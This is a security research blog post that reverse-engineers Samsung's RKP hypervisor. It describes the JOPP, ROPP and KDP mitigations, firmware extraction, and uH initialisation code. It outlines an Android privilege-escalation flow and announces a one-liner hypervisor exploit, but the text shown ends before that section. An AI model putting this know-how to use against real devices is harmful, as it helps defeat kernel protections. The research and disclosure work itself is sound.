Disclaimer
This work was done while we were working at Longterm Security and they have kindly allowed us to mirror the original article on our company's blog.
The purpose of this blog post is to provide a comprehensive reference of the inner workings of the Samsung RKP. It enables anyone to start poking at this obscure code that is executing at a high privilege level on their device. In addition, a now-fixed vulnerability that allowed getting code execution in Samsung RKP is revealed. It is a good example of a simple mistake that compromises platform security, as the exploit consists of a single call, which is all it takes to make hypervisor memory writable from the kernel.
In the first part, we will talk briefly about Samsung's kernel mitigations (that probably deserve a blog post of their own). In the second part, we will explain how to get your hands on the RKP binary for your device.
In the third part, we will start taking apart the hypervisor framework that supports RKP on the Exynos devices, before digging into the internals of RKP in the fourth part. We will detail how it is started, how it processes the kernel page tables, how it protects sensitive data structures, and finally, how it enables the kernel mitigations.
In the fifth and last part, we will reveal the vulnerability, the one-liner exploit, and take a look at the patch.
In the mobile device world, security traditionally relied on kernel mechanisms. But history has shown us that the kernel was far from being unbreakable. For most Android devices, finding a kernel vulnerability allows an attacker to modify sensitive kernel data structures, elevate privileges, and execute malicious code.
It is also simply not enough to ensure kernel integrity at boot time (using the Verified Boot mechanism). Kernel integrity must also be verified at run time. This is what a security hypervisor aims to do. RKP, standing for Real-time Kernel Protection, is the name of Samsung's hypervisor implementation, which is part of Samsung KNOX.
A lot of great research has already been done on Samsung RKP, in particular Gal Beniamini's Lifting the (Hyper) Visor: Bypassing Samsung’s Real-Time Kernel Protection and Aris Thallas's On emulating hypervisors: a Samsung RKP case study, both of which we highly recommend reading before this blog post.
A typical local privilege escalation (LPE) flow on Android involves:

- setting address_limit to -1;
- patching selinux_(enable|enforcing);
- overwriting the uid, gid, sid, capabilities, etc. of the current task.

Samsung has implemented mitigations to try and make that task as hard as possible for an attacker: JOPP, ROPP, and KDP are three of them. Not all Samsung devices have the same mitigations in place, though.
Here is what we observed after downloading various firmware updates:
Device | Region | JOPP | ROPP | KDP |
---|---|---|---|---|
Low-end | International | No | No | Yes |
Low-end | United States | No | No | Yes |
High-end | International | Yes | No | Yes |
High-end | United States | Yes | Yes | Yes |
Jump-Oriented Programming Prevention (JOPP) aims to prevent JOP. It is a homemade CFI solution. It begins by inserting a NOP instruction before each function's start using a modified compiler toolchain. It then uses a Python script (scripts/rkp_cfp/instrument.py
) to process the compiled kernel binary: NOPs are replaced with a magic value (0xbe7bad) and indirect branches with a direct branch to a helper function.
The helper function jopp_springboard_blr_rX
(in init/rkp_cfp.S
) will check if the value before the target matches the magic value and take the jump if it does, or crash if it doesn't:
.macro springboard_blr, reg
jopp_springboard_blr_\reg:
push RRX, xzr
ldr RRX_32, [\reg, #-4]
subs RRX_32, RRX_32, #0xbe7, lsl #12
cmp RRX_32, #0xbad
b.eq 1f
...
inst 0xdeadc0de //crash for sure
...
1:
pop RRX, xzr
br \reg
.endm
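To make the instrumentation more concrete, here is a hypothetical example of what a protected callee and a rewritten call site look like after processing (the register and symbol names are ours, not taken from an actual kernel build):

```asm
// Hypothetical callee: the NOP emitted by the modified toolchain right before
// the function start has been replaced by the magic value.
    .word 0xbe7bad
my_callee:
    // ...

// Hypothetical call site: the original "blr x3" has been replaced by a direct
// branch to the springboard, which checks that the word at [x3, #-4] is
// 0xbe7bad before branching to x3.
    bl jopp_springboard_blr_x3
```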
Return-Oriented Programming Prevention (ROPP) aims to prevent ROP. It is a homemade "stack canary". It uses the same modified compiler toolchain to emit NOP instructions before stp x29, x30
instructions and after ldp x29, x30
instructions, and to prevent allocation of registers X16 and X17. It then uses the same Python script to replace the prologues and epilogues of assembled C functions like so:
nop
stp x29, x30, [sp,#-<frame>]!
(insns)
ldp x29, x30, ...
nop
is replaced by
eor RRX, x30, RRK
stp x29, RRX, [sp,#-<frame>]!
(insns)
ldp x29, RRX, ...
eor x30, RRX, RRK
where RRX
is an alias for X16 and RRK
for X17.
RRK is called the "thread key" and is unique to each kernel task. Instead of directly pushing the return address onto the stack, they XOR it with this key first, preventing an attacker from changing the return address without knowledge of the thread key.
The thread key itself is stored in the rrk
field of the thread_info
structure, but XORed with the RRMK.
struct thread_info {
// ...
unsigned long rrk;
};
RRMK is called the "master key". On production devices, it is stored in the system register Debug Breakpoint Value Register 5 (DBGBVR5_EL1
). It is set by the hypervisor during kernel initialization, as we will see later.
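Putting the pieces together, here is an illustrative sketch (not actual kernel or RKP code; read_rrmk is a hypothetical accessor for the master key register) of how the keys relate:

```c
/* Illustrative sketch only. The per-thread key used by the rewritten
 * prologues and epilogues is recovered by XORing the rrk field with the RRMK. */
static unsigned long ropp_thread_key(struct thread_info *ti)
{
    unsigned long rrmk = read_rrmk(); /* hypothetical read of the master key register */
    return ti->rrk ^ rrmk;
}

/* What ends up on the stack for a protected frame is:
 *     saved_lr = real_lr ^ thread_key
 * so forging a return address requires knowing the thread key. */
```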
Kernel Data Protection (KDP) is another hypervisor-enabled mitigation. It is a homemade Data Flow Integrity (DFI) solution. It makes sensitive kernel data structures (like the page tables, struct cred
, struct task_security_struct
, struct vfsmount
, SELinux status, etc.) read-only thanks to the hypervisor.
For understanding Samsung RKP, you will need some basic knowledge about the virtualization extensions on ARMv8 platforms. We recommend that you read the section "HYP 101" of Lifting the (Hyper) Visor or the section "ARM Architecture & Virtualization Extensions" of On emulating hypervisors.
A hypervisor, to paraphrase these chapters, executes at a higher privilege level than the kernel, which gives it complete control over the kernel. Here is what the architecture looks like on ARMv8 platforms:
The hypervisor can receive calls from the kernel via the Hypervisor Call (HVC) instruction. Moreover, by using the Hypervisor Configuration Register (HCR), the hypervisor can trap critical operations usually handled by the kernel (access to virtual memory control registers, etc.) and also handle general exceptions.
Finally, the hypervisor takes advantage of a second layer of address translation, called "stage 2 translation". In the standard "stage 1 translation", a Virtual Address (VA) is translated into an Intermediate Physical Address (IPA). This IPA is then translated into the final Physical Address (PA) by the second stage.
Here is what the address translation looks like with 2-stage address translation enabled:
The hypervisor still only has a single-stage address translation for its own memory accesses.
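In short, the two translation regimes described above can be summarized as follows:

```
Kernel accesses (EL1&0):   VA --(stage 1, TTBR0_EL1/TTBR1_EL1)--> IPA --(stage 2, VTTBR_EL2)--> PA
Hypervisor accesses (EL2): VA --(stage 1, TTBR0_EL2)--> PA
```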
To make it easier to get started with this research, we have been using a bootloader-unlocked Samsung A51 (SM-A515F
) instead of a full exploit chain. We have downloaded the kernel source code for our device from the Samsung Open Source website, modified it, and recompiled it (which did not work out of the box).
For this research, we have implemented new syscalls:

- one to read kernel memory;
- one to write kernel memory;
- one to make hypervisor calls (using the uh_call function).

These syscalls make it really convenient to interact with RKP, as you will see in the exploitation section: we just need to write a piece of C code (or Python) that will execute in userland and perform whatever we want.
RKP is implemented for both Exynos and Snapdragon-equipped devices, and both implementations share a lot of code. However, most, if not all, of the existing research has been done on the Exynos variant, as it is the most straightforward to dig into: RKP is available as a standalone binary. On Snapdragon devices, it is embedded inside the Qualcomm Hypervisor Execution Environment (QHEE) image, which is very large and complicated.
On Exynos devices, RKP used to be embedded directly into the kernel binary, and so it could be found as the vmm.elf
file in the kernel source archives. Around late 2017/early 2018, VMM was rewritten into a new framework called uH, which most likely stands for "micro-hypervisor". Consequently, the binary has been renamed to uh.elf
and can still be found in the kernel source archives for a few devices.
Following Gal Beniamini's first suggested design improvement, on most devices RKP has been moved out of the kernel binary and into a partition of its own called uh
. That makes it even easier to extract, for example by grabbing it from the BL_xxx.tar
archive contained in a firmware update (it is usually LZ4-compressed and starts with a 0x1000-byte header that needs to be stripped to get to the real ELF file).
The architecture has changed slightly on the S20 and later devices, as Samsung has introduced another framework to support RKP (called H-Arx
), most likely to further unify the code base with the Snapdragon devices; it also features more uH "apps". However, we won't be taking a look at it in this blog post.
On Snapdragon devices, RKP can be found in the hyp
partition and can also be extracted from the BL_xxx.tar
archive in a firmware update. It is one of the segments that make up the QHEE image.
The main difference with Exynos devices is that it is QHEE that sets the page tables and the exception vector. As a result, it is QHEE that notifies uH when exceptions happen (HVC or trapped system register), and uH has to make a call to QHEE when it wants to modify the page tables. The rest of the code is almost identical.
Back in 2017, the RKP binary was shipped with symbols and log strings. But that isn't the case anymore. Nowadays, the binaries are stripped, and the log strings are replaced with placeholders (like Qualcomm does). Nevertheless, we tried getting our hands on as many binaries as possible, hoping that Samsung did not do that for all of their devices, as is sometimes the case with other OEMs.
By mass downloading firmware updates for various Exynos devices, we gathered around 300 unique hypervisor binaries. None of the uh.elf
files had symbols, so we had to manually port them over from the old vmm.elf
files. Some of the uh.elf
files had the full log strings, the latest being from Apr 9 2019
.
With the full log strings and their hashed versions, we could figure out that the hash value is simply a truncation of SHA-256's output. Here is a Python one-liner to calculate the hash (assuming hashlib is imported and log_string holds the raw bytes of the string), in case you need it:
hashlib.sha256(log_string).hexdigest()[:8]
The uH framework acts as a micro-OS, of which RKP is an application. This is really more of a way to organize things, as "apps" are simply a bunch of command handlers and don't have any kind of isolation.
Before digging into the code, we will briefly tell you about the utility structures that are used extensively by uH and the RKP app. We won't be detailing their implementation, but it is important to understand what they do.
The memlist_t
structure is a list of address ranges, a sort of specialized version of a C++ vector (it has a capacity and a size).
typedef struct memlist_entry {
uint64_t addr;
uint64_t size;
uint64_t unkn_10;
uint64_t extra;
} memlist_entry_t;
typedef struct memlist {
memlist_entry_t* base;
uint32_t capacity;
uint32_t count;
uint32_t merged;
crit_sec_t cs;
} memlist_t;
There are functions to add and remove address ranges from a memlist, to check if an address is contained in a memlist, if an address range overlaps with a memlist, etc.
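As an illustration, here are hypothetical prototypes for these helpers (the names and exact signatures are our own reconstruction from the binary and may differ slightly):

```c
int64_t memlist_init(memlist_t* list);
int64_t memlist_add(memlist_t* list, uint64_t addr, uint64_t size);
int64_t memlist_remove(memlist_t* list, uint64_t addr, uint64_t size);
bool memlist_contains_addr(memlist_t* list, uint64_t addr);
bool memlist_overlaps_range(memlist_t* list, uint64_t addr, uint64_t size);
```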
The sparsemap_t
structure is a map that associates values with addresses. It is created from a memlist and will map all the addresses in this memlist to a value. The size of this value is determined by the bit_per_page
field.
typedef struct sparsemap_entry {
uint64_t addr;
uint64_t size;
uint64_t bitmap_size;
uint8_t* bitmap;
} sparsemap_entry_t;
typedef struct sparsemap {
char name[8];
uint64_t start_addr;
uint64_t end_addr;
uint64_t count;
uint64_t bit_per_page;
uint64_t mask;
crit_sec_t cs;
memlist_t* list;
sparsemap_entry_t* entries;
uint32_t private;
uint32_t unkn_54;
} sparsemap_t;
There are functions to get and set the value for each entry of the map, etc.
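Again as an illustration, here are hypothetical prototypes for the sparsemap helpers (sparsemap_init and sparsemap_for_all_entries appear later in uh_init; the getter and setter names are our own):

```c
int64_t sparsemap_init(const char* name, sparsemap_t* map, memlist_t* list, uint64_t bit_per_page, uint32_t private);
int64_t sparsemap_for_all_entries(sparsemap_t* map, int64_t (*func)(uint64_t addr, uint64_t size));
uint64_t sparsemap_get_value_addr(sparsemap_t* map, uint64_t addr);
int64_t sparsemap_set_value_addr(sparsemap_t* map, uint64_t addr, uint64_t value);
```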
The crit_sec_t
structure is used to implement critical sections.
typedef struct crit_sec {
uint32_t cpu;
uint32_t lock;
uint64_t lr;
} crit_sec_t;
And of course, there are functions to enter and exit the critical sections.
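These are the helpers used throughout the code shown in this post (signatures reconstructed, so take them as approximate):

```c
void cs_init(crit_sec_t* cs);
void cs_enter(crit_sec_t* cs);
void cs_exit(crit_sec_t* cs);
```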
uH/RKP is loaded into memory by the Samsung Bootloader (S-Boot). S-Boot jumps to the EL2 entry-point by asking the secure monitor (running at EL3) to start executing hypervisor code at the address it specifies.
uint64_t cmd_load_hypervisor() {
// ...
part = FindPartitionByName("UH");
if (part) {
dprintf("%s: loading uH image from %d..\n", "f_load_hypervisor", part->block_offset);
ReadPartition(&hdr, part->file_offset, part->block_offset, 0x4c);
dprintf("[uH] uh page size = 0x%x\n", (((hdr.size - 1) >> 12) + 1) << 12);
total_size = hdr.size + 0x1210;
dprintf("[uH] uh total load size = 0x%x\n", total_size);
if (total_size > 0x200000 || hdr.size > 0x1fedf0) {
dprintf("Could not do normal boot.(invalid uH length)\n");
// ...
}
ret = memcmp_s(&hdr, "GREENTEA", 8);
if (ret) {
ret = -1;
dprintf("Could not do uh load. (invalid magic)\n");
// ...
} else {
ReadPartition(0x86fff000, part->file_offset, part->block_offset, total_size);
ret = pit_check_signature(part->partition_name, 0x86fff000, total_size);
if (ret) {
dprintf("Could not do uh load. (invalid signing) %x\n", ret);
// ...
}
load_hypervisor(0xc2000400, 0x87001000, 0x2000, 1, 0x87000000, 0x100000);
dprintf("[uH] load hypervisor\n");
}
} else {
ret = -1;
dprintf("Could not load uH. (invalid ppi)\n");
// ...
}
return ret;
}
void load_hypervisor(...) {
dsb();
asm("smc #0");
isb();
}
Please note that on recent Samsung devices, the monitor code, based on the ARM Trusted Firmware (ATF), is no longer in plain-text in the S-Boot binary. In its place, one can find an encrypted blob. A vulnerability in Samsung's Trusted OS implementation (TEEGRIS) will need to be found so that plain-text monitor code can be dumped.
The address translation process for EL1 accesses has two stages, whereas the AT process for EL2 accesses only has one. In the hypervisor code, stage 1 (abbreviated s1
) refers to the first stage of the EL2 AT process that governs hypervisor accesses. Stage 2 (abbreviated s2
) refers to the second stage of the EL1 AT process that governs kernel accesses.
Execution starts in the default
function. This function checks if it is running at EL2 before calling main
. Once main
returns, it makes an SMC, presumably to give control back to S-Boot.
void default(...) {
// ...
if (get_current_el() == (0b10 /* EL2 */ << 2)) {
// Save registers x0 to x30, sp_el1, elr_el2, spsr_el2.
// ...
// Reset the .bss section.
memset(&rkp_bss_start, 0, 0x1000);
main(saved_regs.x0, saved_regs.x1, &saved_regs);
}
// Return to S-Boot after initialization.
asm("smc #0");
}
After disabling the alignment checks and making sure the binary is loaded at the expected address (0x87000000 for this binary), main
sets TTBR0_EL2
to its initial page tables and calls s1_enable
to enable address translation at EL2. The initial page tables for EL2, embedded directly in the hypervisor binary, contain a 1:1 mapping of the uH region.
int32_t main(int64_t x0, int64_t x1, saved_regs_t* regs) {
// ...
// SCTLR_EL2, System Control Register (EL2).
//
// - A, bit [1] = 0: Alignment fault checking disabled.
// - SA, bit [3] = 0: SP Alignment check disabled.
set_sctlr_el2(get_sctlr_el2() & 0xfffffff5);
// Prevent the hypervisor from being initialized twice.
if (!initialized) {
initialized = 1;
// Check if the loading address is as expected.
if (&hyp_base != 0x87000000) {
uh_log('L', "slsi_main.c", 326, "[-] static s1 mmu mismatch");
return -1;
}
// Set the EL2 page tables start address.
set_ttbr0_el2(&static_s1_page_tables_start__);
// Enable the EL2 address translation.
s1_enable();
// Initialize the hypervisor.
uh_init(0x87000000, 0x200000);
// Initialize the virtual memory manager (VMM).
if (vmm_init()) {
return -1;
}
uh_log('L', "slsi_main.c", 338, "[+] vmm initialized");
// Set the second stage EL1 page tables start address.
set_vttbr_el2(&static_s2_page_tables_start__);
uh_log('L', "slsi_main.c", 348, "[+] static s2 mmu initialized");
// Enable the second stage of EL1 address translation.
s2_enable();
uh_log('L', "slsi_main.c", 351, "[+] static s2 mmu enabled");
}
uh_log('L', "slsi_main.c", 355, "[*] initialization completed");
return 0;
}
s1_enable
sets mostly cache-related fields of MAIR_EL2
, TCR_EL2
, and SCTLR_EL2
, and most importantly, enables the MMU for the EL2. main
then calls the uh_init
function and passes it the uH memory range. It seems that Gal Beniamini's second suggested design improvement, setting the WXN bit to 1, has also been implemented by the Samsung KNOX team.
void s1_enable() {
// ...
cs_init(&s1_lock);
// MAIR_EL2, Memory Attribute Indirection Register (EL2).
//
// - Attr0, bits[7:0] = 0xff: Normal memory, Outer & Inner Write-Back Non-transient, Outer & Inner Read-Allocate
// Write-Allocate).
// - Attr1, bits[15:8] = 0x00: Device-nGnRnE memory.
// - Attr2, bits[23:16] = 0x44: Normal memory, Outer & Inner Write-Back Transient, Outer & Inner No Read-Allocate No
// Write-Allocate).
set_mair_el2(get_mair_el2() & 0xffffffffff000000 | 0x4400ff);
// TCR_EL2, Translation Control Register (EL2).
//
// - T0SZ, bits [5:0] = 24: TTBR0_EL2 region size is 2^40.
// - IRGN0, bits [9:8] = 0b11: Normal memory, Outer & Inner Write-Back Read-Allocate No Write-Allocate Cacheable.
// - ORGN0, bits [11:10] = 0b11: Normal memory, Outer & Inner Write-Back Read-Allocate No Write-Allocate Cacheable.
// - SH0, bits [13:12] = 0b11: Inner Shareable.
// - PS, bits [18:16] = 0b010: PA size is 40 bits, 1TB.
set_tcr_el2(get_tcr_el2() & 0xfff8c0c0 | 0x23f18);
flush_entire_cache();
sctlr_el2 = get_sctlr_el2();
// SCTLR_EL2, System Control Register (EL2).
//
// - C, bit [2] = 1: data is cacheable for EL2.
// - I, bit [12] = 1: instruction access is cacheable for EL2.
// - WXN, bit [19] = 1: writeable implies non-executable for EL2.
set_sctlr_el2(sctlr_el2 & 0xfff7effb | 0x81004);
invalidate_entire_s1_el2_tlb();
// - M, bit [0] = 1: EL2 stage 1 address translation enabled.
set_sctlr_el2(sctlr_el2 & 0xfff7effa | 0x81005);
}
After saving the arguments into a global control structure called uh_state
, uh_init
calls static_heap_initialize
. This function also saves its arguments into global variables and initializes the doubly linked list of heap chunks with a single free chunk spanning over the hypervisor memory range.
uh_init
then calls static_heap_remove_range
to remove three important ranges (the log, hypervisor code, and bigdata regions) from the memory that can be returned by the static heap allocator, effectively splitting the original chunk into multiple ones:
int64_t uh_init(int64_t uh_base, int64_t uh_size) {
// ...
// Reset the global state of the hypervisor.
memset(&uh_state.base, 0, sizeof(uh_state));
// Save the hypervisor base address and size.
uh_state.base = uh_base;
uh_state.size = uh_size;
// Initialize the static heap with the whole hypervisor memory.
static_heap_initialize(uh_base, uh_size);
// But remove the log, uH and bigdata regions from it.
if (!static_heap_remove_range(0x87100000, 0x40000) || !static_heap_remove_range(&hyp_base, 0x87046000 - &hyp_base) ||
!static_heap_remove_range(0x870ff000, 0x1000)) {
uh_panic();
}
// Initialize the log region.
memory_init();
uh_log('L', "main.c", 131, "================================= LOG FORMAT =================================");
uh_log('L', "main.c", 132, "[LOG:L, WARN: W, ERR: E, DIE:D][Core Num: Log Line Num][File Name:Code Line]");
uh_log('L', "main.c", 133, "==============================================================================");
uh_log('L', "main.c", 134, "[+] uH base: 0x%p, size: 0x%lx", uh_state.base, uh_state.size);
uh_log('L', "main.c", 135, "[+] log base: 0x%p, size: 0x%x", 0x87100000, 0x40000);
uh_log('L', "main.c", 137, "[+] code base: 0x%p, size: 0x%p", &hyp_base, 0x46000);
uh_log('L', "main.c", 139, "[+] stack base: 0x%p, size: 0x%p", stacks, 0x10000);
uh_log('L', "main.c", 143, "[+] bigdata base: 0x%p, size: 0x%p", 0x870ffc40, 0x3c0);
uh_log('L', "main.c", 152, "[+] date: %s, time: %s", "Feb 27 2020", "17:28:58");
uh_log('L', "main.c", 153, "[+] version: %s", "UH64_3b7c7d4f exynos9610");
// Register the command handlers for the INIT app.
uh_register_commands(0, init_cmds, 0, 5, 1);
// Register the command handlers for the RKP app.
j_rkp_register_commands();
uh_log('L', "main.c", 370, "%d app started", 1);
// Initialize the INIT app.
system_init();
// Initialize the other apps (including the RKP app).
apps_init();
// Initialize the bigdata region.
uh_init_bigdata();
// Initialize the context buffer.
uh_init_context();
// Create the memlist of memory regions used by the dynamic heap allocator.
memlist_init(&uh_state.dynamic_regions);
// Create and fill the memlist of protected ranges (critical memory regions).
pa_restrict_init();
// Mark the hypervisor as initialized.
uh_state.inited = 1;
uh_log('L', "main.c", 427, "[+] uH initialized");
return 0;
}
uh_init
then calls memory_init
which zeroes out the log region and maps it into the EL2 page tables. This region will be used by the printf
-like string printing functions, which are called inside of the uh_log
function.
int64_t memory_init() {
// Reset the log region.
memory_buffer = 0x87100000;
memset(0x87100000, 0, 0x40000);
cs_init(&memory_cs);
clean_invalidate_data_cache_region(0x87100000, 0x40000);
memory_buffer_index = 0;
memory_active = 1;
// Map it into the hypervisor page tables as writable.
return s1_map(0x87100000, 0x40000, UNKN3 | WRITE | READ);
}
uh_init
then logs various information using uh_log
(these messages can be retrieved from /proc/uh_log
on the device). uh_init
then calls uh_register_commands
and rkp_register_commands
(which ends up calling uh_register_commands
but with a different set of arguments).
uh_register_commands
takes as arguments the application ID, an array of command handlers, an optional command "checker" function, the number of commands in the array, and a debug flag. These values will be stored in the fields cmd_evtable
, cmd_checkers
, cmd_counts
, and cmd_flags
of the uh_state
structure and will be used to handle hypervisor calls coming from the kernel.
int64_t uh_register_commands(uint32_t app_id,
int64_t cmd_array,
int64_t cmd_checker,
uint32_t cmd_count,
uint32_t flag) {
// ...
// Ensure the hypervisor hasn't already been initialized.
if (uh_state.inited) {
uh_log('D', "event.c", 11, "uh_register_event is not permitted after uh_init : %d", app_id);
}
// Perform sanity-checking on the application ID.
if (app_id >= 8) {
uh_log('D', "event.c", 14, "wrong app_id %d", app_id);
}
// Save the arguments into the `uh_state` global variable.
uh_state.cmd_evtable[app_id] = cmd_array;
uh_state.cmd_checkers[app_id] = cmd_checker;
uh_state.cmd_counts[app_id] = cmd_count;
uh_state.cmd_flags[app_id] = flag;
uh_log('L', "event.c", 21, "app_id:%d, %d events and flag(%d) has registered", app_id, cmd_count, flag);
// The "command checker" is optional.
if (cmd_checker) {
uh_log('L', "event.c", 24, "app_id:%d, cmd checker enforced", app_id);
}
return 0;
}
According to the kernel sources, there are only 3 applications defined, even though uH technically supports up to 8.
- APP_INIT, which is used by S-Boot during initialization;
- APP_SAMPLE, which is unused;
- APP_RKP, which is used by the kernel to interact with RKP.

#define APP_INIT 0
#define APP_SAMPLE 1
#define APP_RKP 2
#define UH_PREFIX UL(0xc300c000)
#define UH_APPID(APP_ID) ((UL(APP_ID) & UL(0xFF)) | UH_PREFIX)
enum __UH_APP_ID {
UH_APP_INIT = UH_APPID(APP_INIT),
UH_APP_SAMPLE = UH_APPID(APP_SAMPLE),
UH_APP_RKP = UH_APPID(APP_RKP),
};
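As the definitions above show, the application ID passed to uH is prefixed with 0xc300c000; the command ID and up to four arguments follow in the next registers. Assuming the kernel's uh_call helper shown later in this post (x0 = prefixed app ID, x1 = command ID, x2-x5 = arguments), a call looks like the sketch below; the argument semantics are command-specific and not detailed here:

```c
/* Sketch only: invoke command cmd_id of the RKP application with two arguments. */
uh_call(UH_APP_RKP, cmd_id, arg0, arg1, 0, 0);
```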
uh_init
then calls system_init
and apps_init
. These functions call the command handler #0 of the corresponding application(s): system_init does so for APP_INIT, while apps_init does it for all the other registered applications. In our case, this ends up calling init_cmd_init
and rkp_cmd_init
, respectively.
uint64_t system_init() {
// ...
memset(&saved_regs, 0, sizeof(saved_regs));
// Call the command handler #0 of APP_INIT.
res = uh_handle_command(0, 0, &saved_regs);
if (res) {
uh_log('D', "main.c", 380, "system init failed %d", res);
}
return res;
}
uint64_t apps_init() {
// ...
memset(&saved_regs, 0, sizeof(saved_regs));
// Iterate on all applications but APP_INIT.
for (i = 1; i != 8; ++i) {
// Ensure the application is registered.
if (uh_state.cmd_evtable[i]) {
uh_log('W', "main.c", 393, "[+] dst %d initialized", i);
// Call the command handler #0 of the application.
res = uh_handle_command(i, 0, &saved_regs);
if (res) {
uh_log('D', "main.c", 396, "app init failed %d", res);
}
}
}
return res;
}
uh_handle_command
prints the app ID, command ID, and its arguments if the debug flag was set, calls the command checker function if any, and then calls the appropriate command handler.
int64_t uh_handle_command(uint64_t app_id, uint64_t cmd_id, saved_regs_t* regs) {
// ...
// If debug is enabled, log the command to be handled.
if ((uh_state.cmd_flags[app_id] & 1) != 0) {
uh_log('L', "main.c", 441, "event received %lx %lx %lx %lx %lx %lx", app_id, cmd_id, regs->x2, regs->x3, regs->x4,
regs->x5);
}
// If a "command checker" is registered for the application, call it.
cmd_checker = uh_state.cmd_checkers[app_id];
if (cmd_id && cmd_checker && cmd_checker(cmd_id)) {
uh_log('E', "main.c", 448, "cmd check failed %d %d", app_id, cmd_id);
return -1;
}
// Perform sanity-checking on the application ID.
if (app_id >= 8) {
uh_log('D', "main.c", 453, "wrong dst %d", app_id);
}
// Ensure the destination application is registered.
if (!uh_state.cmd_evtable[app_id]) {
uh_log('D', "main.c", 456, "dst %d evtable is NULL\n", app_id);
}
// Perform sanity-checking on the command ID.
if (cmd_id >= uh_state.cmd_counts[app_id]) {
uh_log('D', "main.c", 459, "wrong type %lx %lx", app_id, cmd_id);
}
// Get the actual command handler.
cmd_handler = uh_state.cmd_evtable[app_id][cmd_id];
if (!cmd_handler) {
uh_log('D', "main.c", 464, "no handler %lx %lx", app_id, cmd_id);
return -1;
}
// And finally, call it.
return cmd_handler(regs);
}
uh_init
then calls uh_init_bigdata
and uh_init_context
.
uh_init_bigdata
allocates and zeroes out the buffers used by the analytics feature. It also makes the bigdata region accessible as read/write in the EL2 page tables.
int64_t uh_init_bigdata() {
// Allocate a buffer to store the analytics collected.
if (!bigdata_state) {
bigdata_state = malloc(0x230, 0);
}
// Reset this buffer and the bigdata global state.
memset(0x870ffc40, 0, 960);
memset(bigdata_state, 0, 560);
// Map this buffer into the hypervisor as writable.
return s1_map(0x870ff000, 0x1000, UNKN3 | WRITE | READ);
}
uh_init_context
allocates and zeroes out a buffer that is used to store the hypervisor registers on platform resets (we don't know where it is used, maybe by the monitor to restore the hypervisor state on some event).
int64_t* uh_init_context() {
// ...
// Allocate a buffer to store the processor context.
uh_context = malloc(0x1000, 0);
if (!uh_context) {
uh_log('W', "RKP_1cae4f3b", 21, "%s RKP_148c665c", "uh_init_context");
}
// Reset this buffer.
return memset(uh_context, 0, 0x1000);
}
uh_init
calls memlist_init
to initialize the dynamic_regions
memlist in the uh_state
structure, which will contain the memory regions that can be used by the dynamic allocator, and then calls the pa_restrict_init
function.
pa_restrict_init
initializes the protected_ranges
memlist, which contains the critical hypervisor memory regions that should be protected, and adds the hypervisor memory region to it. It also checks that rkp_cmd_counts
and the protected_ranges
structures are contained in the memlist as they should be.
int64_t pa_restrict_init() {
// Initialize the memlist of protected ranges.
memlist_init(&protected_ranges);
// Add the uH memory region to it (containing the hypervisor code and data).
protected_ranges_add(0x87000000, 0x200000);
// Sanity-check: it must contain the `rkp_cmd_counts` array.
if (!protected_ranges_contains(&rkp_cmd_counts)) {
uh_log('D', "pa_restrict.c", 79, "Error, cmd_cnt not within protected range, cmd_cnt addr : %lx", rkp_cmd_counts);
}
// Sanity-check: it must also contain itself.
if (!protected_ranges_contains(&protected_ranges)) {
uh_log('D', "pa_restrict.c", 84, "Error protect_ranges not within protected range, protect_ranges addr : %lx",
&protected_ranges);
}
return uh_log('L', "pa_restrict.c", 87, "[+] uH PA Restrict Init");
}
uh_init
returns to main
, which then calls vmm_init
to initialize the virtual memory management system at EL1.
vmm_init
sets the VBAR_EL2
register to the exception vector containing the hypervisor functions to be called to handle exceptions, and enables trapping of accesses to the virtual memory control registers at EL1.
int64_t vmm_init() {
// ...
uh_log('L', "vmm.c", 142, ">>vmm_init<<");
cs_init(&stru_870355E8);
cs_init(&panic_cs);
// Set the vector table of the hypervisor.
set_vbar_el2(&vmm_vector_table);
// HCR_EL2, Hypervisor Configuration Register.
//
// TVM, bit [26] = 1: EL1 write accesses to the specified EL1 virtual memory control registers are trapped to EL2.
hcr_el2 = get_hcr_el2() | 0x4000000;
uh_log('L', "vmm.c", 161, "RKP_398bc59b %x", hcr_el2);
set_hcr_el2(hcr_el2);
return 0;
}
main then sets the VTTBR_EL2 register to the page tables that will be used for the second stage of address translation at EL1. These are the page tables that translate a kernel IPA into an actual PA. Finally, before returning, main calls s2_enable.
s2_enable
configures the second stage of address translation and enables it.
void s2_enable() {
// ...
cs_init(&s2_lock);
// VTCR_EL2, Virtualization Translation Control Register.
//
// - T0SZ, bits [5:0] = 24: VTTBR_EL2 region size is 2^40.
// - SL0, bits [7:6] = 0b01: Stage 2 translation lookup start at level 1.
// - IRGN0, bits [9:8] = 0b11: Normal memory, Outer & Inner Write-Back Read-Allocate No Write-Allocate Cacheable.
// - ORGN0, bits [11:10] = 0b11: Normal memory, Outer & Inner Write-Back Read-Allocate No Write-Allocate Cacheable.
// - SH0, bits [13:12] = 0b11: Inner Shareable.
// - TG0, bits [15:14] = 0b00: Granule size is 4KB.
// - PS, bits [18:16] = 0b010: PA size is 40 bits, 1TB.
set_vtcr_el2(get_vtcr_el2() & 0xfff80000 | 0x23f58);
invalidate_entire_s1_s2_el1_tlb();
// HCR_EL2, Hypervisor Configuration Register.
//
// VM, bit [0] = 1: EL1&0 stage 2 address translation enabled.
set_hcr_el2(get_hcr_el2() | 1);
lock_start = 1;
}
We mentioned that uh_init
calls the command #0 for each of the registered applications. Let's see what is being executed for the two applications that are used: APP_INIT
and APP_RKP
.
APP_INIT

The command handlers registered for APP_INIT are:
Command ID | Command Handler | Maximum Calls |
---|---|---|
0x00 | init_cmd_init | - |
0x02 | init_cmd_add_dynamic_region | - |
0x03 | init_cmd_id_0x03 | - |
0x04 | init_cmd_initialize_dynamic_heap | - |
Let's take a look at command handler #0 called in uh_init
. It is really simple: it sets the fault_handler
field of uh_state
. This structure contains the address of a kernel function that will be called when a fault is detected by the hypervisor.
int64_t init_cmd_init(saved_regs_t* regs) {
// ...
// Ensure the fault handler can only be set once.
if (!uh_state.fault_handler && regs->x2) {
// Save the value provided into `uh_state`.
uh_state.fault_handler = rkp_get_pa(regs->x2);
uh_log('L', "main.c", 161, "[*] uH fault handler has been registered");
}
return 0;
}
When uH calls this command, it won't do anything as the registers, including x2, are all set to 0. But this command will also be called later by the kernel, as can be seen in the rkp_init
function in init/main.c
.
static void __init rkp_init(void)
{
uh_call(UH_APP_INIT, 0, uh_get_fault_handler(), kimage_voffset, 0, 0);
// ...
}
Let's take a look at the fault handler registered by the kernel. It comes from the call to uh_get_fault_handler
, which reveals that it is actually the uh_fault_handler
function.
u64 uh_get_fault_handler(void)
{
uh_handler_list.uh_handler = (u64) & uh_fault_handler;
return (u64) & uh_handler_list;
}
